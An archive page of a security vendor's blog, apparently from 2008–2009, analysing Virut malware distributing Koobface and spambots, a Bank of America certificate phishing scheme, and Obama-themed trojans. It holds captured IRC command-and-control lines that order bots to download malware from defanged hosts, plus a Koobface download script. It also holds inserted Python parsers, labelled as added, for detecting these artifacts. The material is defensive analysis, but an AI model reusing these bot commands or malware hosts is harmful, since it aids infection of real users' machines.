Archive for the ‘Rootkit’ Category

Virut Distributing Koobface, Ad-Clickers and Spambots

Tuesday, May 26th, 2009

Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) to prevent the new variants on users’ systems even when the traditional AV scanners have failed to keep up.

Are viruses a thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus-writing skills? No. What we find is that the hosting servers, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, HTML file appending, and hooking techniques. But what is the group behind it up to now?
This summary will put together a few more key points on the threat’s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We’ll see that it is responsible for far more than infected files and IRC traffic, including adware, rootkits, password stealers, worms and spambots.

Virut’s current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of infections by a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy, so that the disinfection routines of the major AV vendors may end up corrupting the very executable files they are meant to clean when the infection is detected.

DO NOT VISIT THE MALICIOUS WEBSITES DESCRIBED HERE…

The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3
JOIN #.xxx

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves “load.exe” malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.
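The session above is IRC carried over TCP port 80, so a plain HTTP-aware filter can miss it. The following is an added example (not code from the original post or from ThreatFire) that parses a constructed session in the same shape, flags a port-80 stream that opens with IRC registration instead of an HTTP request line, and pulls out the channel joined and every URL pushed through a “!get” private message; the nick, channel and server names are the page’s own placeholders.

```python
import re

# Constructed sample in the shape of the port-80 IRC session quoted above (not a real capture);
# the nick, channel and URLs are the page's placeholders and defanged hxxp links.
SAMPLE_SESSION = """NICK xxx
USER xxx . . :#xxx Service Pack 3
JOIN #.xxx
:u. PRIVMSG xxx :!get hxxp://cock.8866.org:88/files/adx.gif
:u. PRIVMSG xxx :!get hxxp://dl.guarddog2009.com/cw.exe
PING :l.
PONG :l.
:u. PRIVMSG xxx :hello
"""

# RFC 1459 line shape: [":" prefix SPACE] command [SPACE params]
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>\S+)(?:\s+(?P<params>.*))?$")
HTTP_METHODS = {"GET", "POST", "HEAD", "PUT", "OPTIONS", "CONNECT"}

def parse_irc_line(line):
    """Split one raw IRC line into (prefix, COMMAND, middle params, trailing param)."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    prefix, cmd, params = m.group("prefix"), m.group("cmd").upper(), m.group("params") or ""
    trailing = None
    if params.startswith(":"):
        params, trailing = "", params[1:]
    elif " :" in params:
        params, trailing = params.split(" :", 1)
    return prefix, cmd, params.split(), trailing

def irc_on_http_port(session_text):
    """True when a stream seen on port 80 opens with IRC registration, not an HTTP request line."""
    first = session_text.strip().split("\n", 1)[0].split()
    return bool(first) and first[0] not in HTTP_METHODS and first[0].upper() in {"NICK", "USER", "PASS"}

def find_download_commands(session_text):
    """Collect the channels joined and the URLs pushed to the bot via '!get' private messages."""
    channels, urls = [], []
    for line in session_text.splitlines():
        parsed = parse_irc_line(line)
        if parsed is None:
            continue
        _prefix, cmd, params, trailing = parsed
        if cmd == "JOIN" and params:
            channels.append(params[0])
        elif cmd == "PRIVMSG" and trailing and trailing.lower().startswith("!get "):
            urls.append(trailing.split(None, 1)[1].strip())
    return {"channels": channels, "urls": urls}
```

Feeding a reassembled TCP stream from a port-80 capture into find_download_commands gives a responder the list of second-stage URLs to block and hunt for without having to read the session by hand.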

Of those domains, it is interesting that “dl.guarddog2009.com” is actively serving Koobface worm variants and ad poppers, considering that scareware/rogueware is being peddled from the same IP. Avoid it.

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

Another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
#PID=xxx
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper)
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)
WAIT|120
#BLACKLABEL
EXIT
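As an added example (not code from the original post or from ThreatFire), here is a small parser for the line-oriented gen.php response shown above, built over a constructed sample in the same shape. The meaning given to each directive (START names a file to fetch, WAIT a pause in seconds, EXIT the end of the script, and “#” lines as metadata) is inferred from the shape of the response, not documented on the page, so treat it as an assumption.

```python
# Constructed sample in the shape of the gen.php response quoted above (not a real capture).
SAMPLE_RESPONSE = """#PID=12345
START|hxxp://www.i-site.ph/1/6244.exe
START|hxxp://www.i-site.ph/1/nfr.exe
WAIT|120
#BLACKLABEL
EXIT
"""

def parse_koobface_response(text):
    """Turn the response script into (metadata dict, ordered list of (directive, argument)).

    Assumed semantics: '#KEY=value' and '#FLAG' lines are metadata, 'START|url' names a file
    the bot is to fetch, 'WAIT|n' is a pause of n seconds, 'EXIT' ends the script. Anything
    else is kept as ('UNKNOWN', line) so a new directive is noticed rather than dropped.
    """
    meta, actions = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            key, _, value = line[1:].partition("=")
            meta[key] = value if value else True
            continue
        directive, _, arg = line.partition("|")
        directive = directive.upper()
        if directive == "START":
            actions.append(("START", arg.strip()))
        elif directive == "WAIT":
            actions.append(("WAIT", int(arg) if arg.strip().isdigit() else 0))
        elif directive == "EXIT":
            actions.append(("EXIT", None))
            break  # nothing after EXIT is executed, so stop reading
        else:
            actions.append(("UNKNOWN", line))
    return meta, actions

def summarize(meta, actions):
    """What a responder wants from the script: bot id, flags, fetch URLs and total dwell time."""
    urls = [arg for d, arg in actions if d == "START"]
    wait = sum(arg for d, arg in actions if d == "WAIT")
    return {"pid": meta.get("PID"), "blacklabel": "BLACKLABEL" in meta,
            "urls": urls, "wait_seconds": wait}
```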

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Host: 85.114.131.69
Pragma: no-cache
(Incidentally, 85.114.131.69 is the host to s2.zief. pl and dl.guarddog2009. com.)
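The request above has three tells at once: a User-Agent that no browser sends, a Host header that is a bare IP, and an executable fetched by path. As an added example (not code from the original post or from ThreatFire), this parses a constructed request in that shape and returns the reasons it looks like a bot-driven download rather than browsing; the IP is the one quoted on the page and the browser-marker list is an assumption for illustration.

```python
import ipaddress

# Constructed request in the shape of the one quoted above (not a real capture).
SAMPLE_REQUEST = ("GET /ad2.exe HTTP/1.0\r\n"
                  "User-Agent: Download\r\n"
                  "Host: 85.114.131.69\r\n"
                  "Pragma: no-cache\r\n\r\n")

# Assumed prefixes of ordinary browser User-Agent strings (illustrative, not exhaustive).
BROWSER_UA_MARKERS = ("Mozilla/", "Opera/")
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers dict keyed by lower-cased name)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path = head[0].split()[:2]
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def suspicious_download_indicators(raw):
    """Return the reasons a request looks like an automated executable fetch; empty if none."""
    method, path, headers = parse_request(raw)
    reasons = []
    ua = headers.get("user-agent", "")
    if not ua.startswith(BROWSER_UA_MARKERS):
        reasons.append(f"non-browser User-Agent {ua!r}")
    host = headers.get("host", "").split(":")[0]
    try:
        ipaddress.ip_address(host)  # raises ValueError for a hostname
        reasons.append("Host header is a bare IP literal")
    except ValueError:
        pass
    if path.lower().endswith(EXECUTABLE_SUFFIXES):
        reasons.append("executable fetched by path")
    return reasons
```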

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
“If you don’t feel like a complete person because you can’t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.”
A link is included that takes you to a “group” at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like “trylamp. com”. Often, other pieces of spam carry offers for pills of all kinds.

Certificate Installation Failure?

Friday, March 13th, 2009

Always be on the lookout for phony warnings and messages from banks and other financial institutions. Even if it is someone claiming to be a banking employee and they know some of your information, do not give out personal information or install unusual applications when you are being contacted over email. You can always contact your bank by calling them back or visiting the web site you were informed of when you opened your account to take care of your business.

An example email blast sent out right now with the subject line “Bank of America Security Department: How to Update Software” warns the receiving user that “Automatic Installation failed for Bank of America certificate component” and provides a bank-sounding link, persuading the user to visit the site. A user could easily be confused by the url, as seen in a browser bar here:


Notice that the link is not “bofa.com” or “bankofamerica.com”, but instead “767certificate.com” (many other confusingly similar URLs are being used in this ongoing scheme). When the link is visited with a browser, the center of the deceptively accurate page presents a demo video and automatically prompts the user to install an “Adobeflashplayer.exe”. As can be seen at this ThreatExpert report, this malware is not a Flash installer. This screenshot shows the certificate warning “You have not been permitted to access the Bank of America Direct login page because your browser did not provide a valid digital certificate” and the accompanying popup for the “Adobeflashplayer.exe” malware download. DO NOT download and run this file:

ThreatFire prevents many behaviors exhibited by this malware as Spyware.Ursnif when protecting a clean system. When ThreatFire is installed on a system previously infected with the spyware and its rootkit, a rootkit Intelliscan identifies the hidden new_drv.sys rootkit driver as Rootkit.Agent, along with the hidden, randomly named 9129837.exe executable copied to c:\windows and its associated registry keys. ThreatFire also quarantines it all properly when selected.

Obama elected U.S. President 44 in a Landslide Victory, but…

Wednesday, November 5th, 2008

any spammed email message claiming to provide a link to information about U.S. culture or foreign policy may likely provide a trojan with rootkit capabilities.

In one of the most prevalent social engineering schemes of this half of the year, users clicking on a spammed link are directed to a web page with a phony video. The user’s browser then displays a request to update their Adobe Flash version to play the video. This time, the malicious executable’s download name is “Adobe_Flash9.exe”. Users seem to be enticed into clicking links with the text “Proceed to the election results news page” and then running this file.
As always, avoid interacting with messages and links that seem questionable.

Another interesting Obama-related file just hitting our community this afternoon has been an infected executable containing a copy of President-elect Barack Obama’s entire acceptance speech: “obama’s presidential speech.exe”. This one appears to be run from a system previously infected with a virus from the family named “Nakuru” or “Kespo”. Symantec’s research team calls it W32.Tupofse.B.
The exe drops the original copy of the .doc file to disk before dropping other viral code, like kspoold.exe. When run, the original .doc file is opened and the entire speech appears:
“If there is anyone out there who still doubts that America is a place where all things are possible; who still wonders if the dream of our founders is alive in our time; who still questions the power of our democracy, tonight is your answer…”
Be sure to pay attention to file extensions before double-clicking on files. The icon for the file is altered by the virus so that it appears to be associated with Word, as if it had a .doc extension, but it has only a .exe extension. Here is an image of the file on a system that doesn’t have Microsoft Word installed (on such a system the Word icon never appears for .doc files; the WordPad icon should appear by default):